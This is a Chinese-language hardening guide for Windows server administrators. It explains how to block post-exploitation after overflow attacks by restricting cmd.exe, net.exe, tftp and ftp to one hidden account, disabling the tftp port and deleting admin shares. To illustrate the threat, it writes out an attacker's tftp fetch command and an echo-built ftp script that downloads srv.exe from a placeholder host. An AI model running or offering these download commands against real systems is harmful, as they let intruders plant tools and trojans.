無可否認，溢出攻擊無論是對黑客，或者安全檢測人員來說，都是對一臺主機測試的時候所會采取的手段，因為溢出攻擊如果成功的話，可以令我們迅速獲取對方主機的一定權限。

　　但是，我們利用溢出就開心，但是網管呢，他可就慘了，尤其是一臺專門用來保護重要數據的主機如果給一些無良黑客，或應該說是駭客吧，他們入侵后，大量刪除數據，無論你有沒有備份數據，損失都是十分嚴重的，所以有效地打補丁倒也是一個好方法，但是，有時候你忘記了呢?或者不知道呢，又或者對方用的是0day Exploit呢!所以打補丁是有效，但不是唯一的方法。但是我卻在看某安全雜志的時候，有一個牛人說到給cmd.exe設置權限，可以有效地防止溢出，再加上我和一些高手交流的時候，說到這個，他們也說理論上可以行得通，但是他們卻叫我試試。

　　好了，不再廢話了，下面說說怎么防止溢出。各位網管可要看仔細啦!

　　首先，我們可以建立一個用戶，名字就叫CmdUser,密碼就設置強壯一點，而且如果你追求完美的話，可以在用戶的名稱前面加上一個$.按照網上所公布的方法，建立一個隱藏帳戶，這樣，就算給人入侵了，也不會使用net user cmduser passworld  來修改這個用戶的密碼。記住哦，那個用戶必須是user等級的哦!

　　建立了用戶后，來到c:\winnt\system32,(這里系統安裝在C盤).找到cmd.exe,用右鍵打開屬性，在安全那里，如圖一所示

圖1

　　我們所要做的就是把所有的用戶刪除，然后添加CmdUser這個用戶，完成后就確定就可以了，但是不要以為這樣就可以了哦，還要找到net.exe這個按照cmd.exe的方法來設置，估計大家找到了net.exe的時候，發現旁邊還有一個net1.exe,這個也要設置哦，設置好了，不要以為松了一口氣，其實這樣雖然可以對付一些菜鳥黑客，但是，如果對方是老鳥來的話，他可以通過tftp，或者ftp等等來傳輸一個本地溢出的溢出程序，我們就game over了，或者他上傳一個木馬，利用替換服務這個方法呢，這個倒也是令人防不勝防啊!

　　可能讀者就要問了，你既然提出來，是不是有方法解決啊，不錯!也算是一點點方法啦，下面就先說說tftp的方法，這個很簡單的，進入C:\WINNT\system32\drivers\etc，用記事本打開services這個文件，如圖2所示

圖2

　　把tftp這個端口修改為0。這樣，入侵著就不會通過使用tftp –I Host get files.exe文件來達到傳輸自己的工具。當然，為了更好的安全性，我們可以通過搜索tftp.exe這個文件，然后把tftp這個執行文件按照cmd。exe那樣，添加成為只有cmduser這個用戶才可以使用。下面就再說說另外一個方法。

　　我相信，大家應該還記得一個使用echo命令來利用ftp來下載東西的命令吧，什么?你不知道?我來說一下：
echo open xxx.xxx.xxx.xxx >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo get srv.exe >>ftp.txt
echo bye >>ftp.txt
 
ftp -s:ftp.txt
del ftp.txt
　　這樣就可以把srv.exe這個軟件下載了，我們也可以按照cmd的方法，通過把ftp的使用權限分配給cmduser，這樣的話，就可以避免給對方上傳軟件了，其實還是有很多方法可以上傳的，但是我還是留下了一些思路給讀者，因為，只有這樣，我們才可以提高自己的技術。另外呢，可能有些朋友可能會利用以下這么一個腳本來關閉ipc$默認共享：
@echo off
net share c$ /del
net share d$ /del
net share e$ /del
net share f$ /del
net share ipc$ /del
net share admin$ /del
@cls
　　但是我們這樣設置的話，可能會令到他們覺得很麻煩，所以，我們是不是可以在最后面那里加上一個 net start explorer ,然后做成開機腳本，這樣可能會好一點。